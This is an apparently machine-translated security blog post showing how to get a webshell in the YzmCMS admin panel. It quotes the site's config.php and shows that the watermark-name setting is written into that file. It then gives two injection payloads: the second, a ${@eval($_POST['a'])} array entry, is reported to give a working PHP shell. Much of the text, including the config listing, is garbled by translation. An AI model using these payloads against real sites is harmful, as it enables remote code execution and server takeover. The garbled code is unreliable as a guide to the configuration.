Yzmcms Backstage Get Shell

Not much nonsense to say, straight into the topic first function.php can see this method is written in the way array traversal to/config/config.php open config.php see

<?phpreturn Array ( //system configuration ' site_theme ' = ' default ',//Site Defaults theme directory ' Url_html_suffix ' = '. html ',//url pseudo-static suffix & nbsp;//database Configuration ' db_type ' = ' mysqli ',//Database link extension "temporarily supports MySQL and mysqli" ' db_host ' = ' 127.0.0.1 ',//server address ' db_name ' = ' yzmcms ',//database name ' Db_user ' + ' root ',//user name ' Db_pwd ' + ' root ',//password ' db_port ' + 3306, Port ' db_prefix ' = ' yzm_ ',//database table prefix  //routing configuration ' route ' = = Array (' m ' = ' = ' index ', ' c ' = ' = ' index ', ' a ' =& gt; ' Init '),//default load configuration, base "M" for the model, "C" for the controller, "a" for event  //cookie configuration ' cookie_domain ' + ', '//cookie scope ' cookie_path ' = '/' ,//cookie action path ' cookie_ttl ' = 0,//cookie life cycle, 0 means with browser process ' cookie_pre ' + ' yzmphp_ ',//cookie prefix, when installing multiple sets of systems under the same domain name, please Modify the cookie prefix ' cookie_secure ' and false,//whether to transmit the cookie //system language through a secure HTTPS connection ' language ' = ' zh_cn ',//"Support Simplified Chinese Zh_c N and American English en_US " //Accessories related configuration ' upload_file ' + ' uploads ',//upload file directory, must not add slash ("/") ' watermark_enable ' = ' 1 ',// Whether to open the picture watermark ' watermark_name ' and ' Mank '.PNG ',//Watermark name ' watermark_position ' = ' 9 ',//watermark location  );? >

Use return array () to define all configurations as an array

33 Line Watermark Name here can be controlled from the background

System Management> System Settings > Additional settingsYou must have thought of it at this point. Close single quotes at the name of the watermark insert a sentence into the config.php such as:

‘,);? ><?php eval ($_post[' a '])?>

Successfully closed insert, then the problem came, not even at that time I was confused. may be the program has some protective measures, and then tried a few treasured years of the dog a word confidently written into, still not even at that time my mood is like this This is not a science of TM.Hurry to ask the Fly master to know is because return out, can be closed single quotation marks to add an array of ideas to engage a few friends after the discussion to get out of this idea

', ' test ' = ' ${@eval ($_post[' a ')}; ", ' a ' = '

Successful connection

Later will be more out of the audit of the article, found not to play audit do not know, a play only to find that they are real dishes alas –

Yzmcms Backstage Get Shell